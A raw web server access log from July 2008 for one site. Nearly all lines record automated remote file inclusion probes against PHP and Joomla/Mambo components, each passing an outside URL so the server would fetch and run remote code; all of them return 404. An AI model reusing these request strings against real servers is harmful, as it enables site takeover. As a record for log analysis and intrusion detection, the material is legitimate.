218.38.54.160 - - [27/Jul/2008:17:46:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ettoresquillace.com/htdocs/modules/tinycontent/admin/spaw/dialogs/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:46:16 -0700] "GET /logs/access_080210.log/core.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET /logs/access_080204.log//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET /logs//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET //ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:47:49 -0700] "GET /logs/access_080121.log//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:47:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.160.176.60 - - [27/Jul/2008:17:48:40 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:27 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:27 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:28 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:33 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:33 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:34 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:41 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:41 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:41 -0700] "GET /logs//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:49:43 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:44 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:45 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:45 -0700] "GET /logs//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:49:45 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:49:51 -0700] "GET /logs/access_080204.log%20//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:49:56 -0700] "GET /logs/access_080204.log%20//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:50:36 -0700] "GET /logs/access_080204.log%20//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:50:43 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:17:50:53 -0700] "GET //components/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:51:29 -0700] "GET /logs/access_080210.log//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:51:31 -0700] "GET /logs/access_080210.log//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:52:50 -0700] "GET /logs/access_080210.log//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:17:54:19 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:17:54:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:55:46 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:17:56:24 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:17:56:24 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:17:56:54 -0700] "GET //tiny_includes/config.php?dir_ws=http://www.iglesialcs.cl/newweb/images/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:17:56:54 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://www.iglesialcs.cl/newweb/images/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:17:56:57 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://www.iglesialcs.cl/newweb/images/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:17:56:57 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://www.iglesialcs.cl/newweb/images/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
208.186.78.5 - - [27/Jul/2008:17:57:01 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
208.186.78.5 - - [27/Jul/2008:17:57:01 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:17:57:04 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:17:57:05 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.186.78.5 - - [27/Jul/2008:17:57:10 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
208.186.78.5 - - [27/Jul/2008:17:57:10 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.32.90.58 - - [27/Jul/2008:17:58:00 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
72.243.169.10 - - [27/Jul/2008:18:00:53 -0700] "GET /logs/access_071224.log/index.php?body=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.243.169.10 - - [27/Jul/2008:18:00:54 -0700] "GET /index.php?body=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.243.169.10 - - [27/Jul/2008:18:00:54 -0700] "GET /logs/index.php?body=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.243.169.10 - - [27/Jul/2008:18:01:20 -0700] "GET /logs/access_071210.log/index.php?body=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.38.54.160 - - [27/Jul/2008:18:02:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ettoresquillace.com/htdocs/modules/tinycontent/admin/spaw/dialogs/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.54.160 - - [27/Jul/2008:18:02:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ettoresquillace.com/htdocs/modules/tinycontent/admin/spaw/dialogs/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:03:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:18:05:03 -0700] "GET /logs/access_080210.log/core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.92.23.89 - - [27/Jul/2008:18:06:11 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:18:06:37 -0700] "GET /logs//components/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:18:06:38 -0700] "GET //components/errors.php?error=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:07:50 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
80.93.82.97 - - [27/Jul/2008:18:08:38 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.93.82.97 - - [27/Jul/2008:18:08:38 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:09:50 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.214.44.28 - - [27/Jul/2008:18:11:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
65.214.44.28 - - [27/Jul/2008:18:11:51 -0700] "GET /wsnlinks/skypephones.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:12:49 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:12:49 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:12:52 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:12:52 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.6.18.240 - - [27/Jul/2008:18:13:19 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:14:30 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:14:30 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:14:30 -0700] "GET /logs//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:14:41 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.93.82.97 - - [27/Jul/2008:18:14:49 -0700] "GET /logs/access_080127.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.157.4.112 - - [27/Jul/2008:18:14:54 -0700] "GET /logs/access_071210.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:15:05 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:15:16 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:18:15:36 -0700] "GET /logs/access_080421.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:18:15:36 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:18:15:36 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:18:16:09 -0700] "GET /logs/access_080616.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
219.94.155.28 - - [27/Jul/2008:18:16:15 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
219.94.155.28 - - [27/Jul/2008:18:16:15 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:16:25 -0700] "GET /logs/access_080427.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
80.93.82.97 - - [27/Jul/2008:18:16:50 -0700] "GET /logs/access_071008.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.128.213 - - [27/Jul/2008:18:16:54 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
219.94.128.213 - - [27/Jul/2008:18:16:55 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:17:06 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.162.56 - - [27/Jul/2008:18:17:31 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
219.94.162.56 - - [27/Jul/2008:18:17:32 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:18:17:59 -0700] "GET /logs/core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:18:18:00 -0700] "GET /core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:18:21 -0700] "GET /logs/access_080421.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:18:23 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:18:26 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:19:06 -0700] "GET /logs/access_080616.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.85.147.82 - - [27/Jul/2008:18:19:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
70.85.147.82 - - [27/Jul/2008:18:19:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:19:41 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:19:41 -0700] "GET //modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:19:50 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:19:50 -0700] "GET //modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:20:24 -0700] "GET //components/com_flyspray/startdown.php?file=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:21:00 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:21:00 -0700] "GET //modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:21:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:21:47 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:21:47 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:21:48 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:21:48 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:22:01 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:22:02 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.6.18.240 - - [27/Jul/2008:18:22:39 -0700] "GET /logs/access_070924.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:23:24 -0700] "GET /logs/access_070820.log//modules/xfsection/modify.php?dir_module=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
59.106.13.141 - - [27/Jul/2008:18:24:20 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
59.106.13.141 - - [27/Jul/2008:18:24:20 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
